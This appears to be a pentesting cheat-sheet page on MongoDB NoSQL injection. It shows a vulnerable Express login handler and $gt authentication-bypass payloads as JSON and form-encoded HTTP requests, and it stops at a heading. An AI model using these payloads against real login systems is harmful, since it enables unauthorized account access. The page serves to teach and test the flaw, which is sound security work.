Skip to content

MongoDB

MongoDB

If the source looks like this below we have control over the JSON key variable.

app.post('/', function (req, res) {
        db.users.find({username: req.body.username, password: req.body.password}, function (err, users) {
            // TODO: handle the rest
        });
});
````

### JSON Greater Than overwrite

Using a **Normal request** with the JSON body `{"username": "test", "password": "abc123"}` creates the correct data.


But using a **Inject Request** with the JSON body to `{"username": {"$gt": ""}, "password": {"$gt": ""}}` creates an injection

`$gt` is a specific property of MongoDB Objects. This is the greater than comparison function. If this is set to the black string "" then it will always return true

**Example Request:**
```http
POST http://target/ HTTP/1.1
Content-Type: application/json

{
    "username": {"$gt": ""},
    "password": {"$gt": ""}
}

Form Body Greater Than overwrite

This can be also done in regular body parameters.

Example Request:

POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username[$gt]=&password[$gt]=

This will overwrite the greater than function and set it to undefined.

Other Special operators